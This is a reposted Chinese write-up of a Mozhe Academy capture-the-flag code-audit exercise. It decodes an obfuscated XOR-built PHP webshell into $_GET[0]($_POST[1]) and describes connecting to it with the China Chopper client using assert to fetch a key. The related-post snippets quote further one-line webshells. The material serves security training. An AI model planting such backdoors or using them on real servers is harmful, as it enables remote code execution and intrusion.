[ 墨者学院 ] 代码审计 —— PHP代码分析溯源（第1题）

最新推荐文章于 2023-01-06 19:03:17 发布

weixin_30908707

最新推荐文章于 2023-01-06 19:03:17 发布

阅读量288

点赞数

文章标签： php

原文链接：http://www.cnblogs.com/qtisec/p/11052742.html

版权

0x01.题目描述：

背景介绍

某日，在某公司做IT维护的朋友给安全工程师"墨者"发了一个PHP文件，说在其WEB服务器发现多了一个b.php文件，目前不确定这个文件是开发留下的正常文件还是攻击者上传的木马后门，希望"墨者"能够帮他分析一下。

实训目标

1、了解PHP语言的基本代码；
2、了解PHP语言中“危险”函数的代码；

0x02.解题过程：

启动靶场环境后，点击生成的链接地址，这里给出了b.php的代码

1 <?php
2 @$_++;
3 $__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
4 $___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
5 ${$__}[!$_](${$___}[$_]);
6 ?>

下面利用php在线工具分析一下这些代码的含义。

（php在线工具：https://tool.lu/coderunner/）

可以看到这里赋值的三个变量的值：

$_ = 1

$__ = _GET

$___ = _POST

然后将这三个值带入下面的语句${$__}[!$_](${$___}[$_])};中，即：${_GET}[!1](${_POST}[1]);最后的结果就是：$_GET[0]($_POST[1]);

构造菜刀的链接参数为http://url/b.php?0=assert，密码为1。

连接即可拿到靶机目录下的key。

问题总结：

这里不明白的是为什么使用的参数是assert而不是eval，下面简述一下assert和eval的不同。

eval函数中参数是字符，如：
eval('echo 1;');
assert函数中参数为表达式 （或者为函数），如：
assert(phpinfo())

转载于:https://www.cnblogs.com/qtisec/p/11052742.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30908707

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

墨者学院 - PHP代码分析溯源(第1题)

多崎巡礼的博客

07-30

870

1、“^”为异或运算符。在PHP中，两个变量进行异或时，会将字符串转换成二进制再进行异或，异或完，又将结果从二进制转换成了字符串。 2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作，在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。 3、$__=("`"^"?").(":"^"}").("%.

墨者学院 - WebShell代码分析溯源(第11题)

多崎巡礼的博客

08-06

744

<?php if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){ //若get到的1不为空且1=GET.fPZ87的话执行下面操作 $_=@fopen('t.php', 'a'); ...

参与评论您还未登录，请先登录后发表或查看评论

[ 墨者学院 ] 代码审计 —— PHP代码分析溯源（第2题）

weixin_30364325的博客

06-20

191

0x01.前言：背景介绍根据提供的源代码，分析找出认证码实训目标 1.掌握php隐式转换2.了解md5的加密解密解题方向审计源代码，需要找一个值，这个值的md5值在php中==题中给定值的md5值 0x02.分析过程：启动...

PHP代码分析溯源(第1题)

mozhe_的博客

05-25

1681

靶场地址：https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码，经分析：1、“^”为异或运算符。在PHP中，两个变量进行异或时，会将字符串转换成二进制再进行异或，异或完，又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作，在PHP中...

墨者学院-PHP代码分析溯源(第1题)

JimWu的博客

09-04

418

PHP代码分析溯源(第1题) 难易程度:★ 题目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.访问网页，得到php代码 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[...

在线靶场-墨者-代码审计1星-PHP代码分析溯源(第1题)

weixin_42079912的博客

07-19

400

了解学习php代码，经过转换后得出: 根据题意，WEB服务器发现多了一个b.php文件，开启菜刀输入地址http://219.153.49.228:46253/b.php?0=assert，密码为1，脚本类型选择php，连接成功后可找到key的php文件，打开即可得到key。 ...

[ 墨者学院 ] 代码审计 —— 密码学加解密实训(Zip伪加密)

weixin_30360497的博客

07-05

223

题目介绍：背景介绍某日墨者工程师收到一份求助邮件，帮忙解出压缩文件的密码，墨者工程师使用各种工具也没有破解出密码。实训目标 1、认识zip压缩文件；2、熟悉zip文件的压缩原理；解题方向熟悉zip加密特征后，16进制查看zi...

墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)

最新发布

05-29

HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)

墨者学院-PHP代码分析溯源(第2题)

qq_37850901的博客

09-26

290

首先，查看给的代码文件， <?php error_reporting(0); $a1 = md5('QNKCDZO'); $a = @$_POST['pass']; $a2 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $a1 == $a2) { /** 内容省略！ ...

墨者学院-CMS系统漏洞分析溯源(第4题)

JimWu的博客

09-04

840

CMS系统漏洞分析溯源(第4题) 难易程度:★★★ 题目类型:身份认证和会话管理使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场，用wwwscan扫一下。发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp，显示还没有登陆。 3.使用cookie-editor，伪造cookie，添加use...

在线靶场-墨者-代码审计1星-PHP代码分析溯源(第2题)

weixin_42079912的博客

07-19

284

进入靶场网页，下载源码文件，打开后发现这样一句语句。将QNKCDZO拿去md5解密发现是0e开头的。根据==比较值，所以存在隐式转换问题。根据代码我们可以知道，0e开头的md5在php中都会被认为是0，只要是0e开头的md5字符串，都可以作为答案输入。答案为：将上列其中一个值输入靶场，即可得到本题key。 ...

墨者学院-PHP代码分析溯源(第3题)

臭nana的博客

12-14

204

这道题跟bugku上面代码审计的十六进制与数字比较那一题差不多可以看一下我的那个博客：https://blog.csdn.net/weixin_43784056/article/details/85005751 54975581388转化成16进制0xccccccccc，记得带上0x；输入0xccccccccc，得到key...

墨者学院 - WebShell代码分析溯源(第1题)

多崎巡礼的博客

07-27

1320

下载源码使用seay源代码审计系统扫一扫（实在不想一个个去看。。。） seay源代码审计系统：https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg 下载出源代码，找到cn-right.php <?php error_reporting(0); $_GET['POST']($_POST['GET']); ?> ...

php代码审计工具_【学习笔记】PHP代码审计入门：代码审计实例1

weixin_39976748的博客

12-06

202

第34课代码审计实战之SQL注入漏洞课程入口(付费)个人背景李，本科，电子信息工程专业，毕业一年半，有JavaScript的，PHP，Python的语言基础，目前自学网络安全中。代码审计实战之SQL注入漏洞现代开发框架对数据库操作的封装当今主流的框架中，基本上都会对数据库的操作做一层封装，上面的代码中使用了参数绑定,在sql语句中出现了 :name 这个...

html input上传文件_finecms代码审计之任意文件上传漏洞

weixin_39608988的博客

11-21

472

“文件上传这个功能在大部分系统中都存在,但是要做好一个文件上传和下载功能的话就非常吃经验,因为涉及到很多的边界条件。”任意文件上传背景介绍首先,文件上传首先就要校验文件类型是否在允许范围内；比如一张图片，用文本编辑器打开在后面追加文字,此时这个文件到底判定成一张图片还是文本呢?虽此时图片仍然能打开,但假如图片里面的信息是文字比图片还多,那么到底认为这个文件是一个图片还是一个文本呢?再比...

Day 9 - Rabbit | RIPS 2017 PHP代码安全审计挑战（RIPSTECH PRESENTS PHP SECURITY CALENDAR）/ Writeup

Ambulong的博客

08-31

366

RIPSTECH PRESENTS PHP SECURITY CALENDAR 是由 RIPS 团队出品的PHP代码安全审计挑战系列题目，RIPSTECH PRESENTS PHP SECURITY CALENDAR 2017 共包含24道题目（Day 1 ~ 24），每道题目将包含一个较新颖的知识点供大家学习。 VULNSPY 提供在线实验环境让您可以在线进行模拟渗透测试，在线体验 RIPST...

Day 2 - Twig | RIPS 2017 PHP代码安全审计挑战（RIPSTECH PRESENTS PHP SECURITY CALENDAR）/ Writeup

Ambulong的博客

08-31

410

Day 5 - Postcard | RIPS 2017 PHP代码安全审计挑战（RIPSTECH PRESENTS PHP SECURITY CALENDAR）/ Writeup

Ambulong的博客

08-31

491

Day 4 - False Beard | RIPS 2017 PHP代码安全审计挑战（RIPSTECH PRESENTS PHP SECURITY CALENDAR）/ Writeup

Ambulong的博客

08-31

366

PHP代码审计

qq_56426046的博客

01-06

799

先从Web漏洞原理开始理解再到漏洞的挖掘以及利用，我们就来到了PHP代码审计这个方向进行进修。这里我们开始学习PHP开发，以及熟悉下开发者的开发思想，站在开发者角度去思索代码。再是掌握漏洞对应发生函数使用，再是学习正则表达式。审计路线：Demo->综合漏洞靶场->网上审计过的CMS->多入口CMS->单入口CMS->框架->函数缺陷作者：Saint Michael原文链接https://www.freebuf.com/articles/web/252333.html相关的一些代码审计的文章。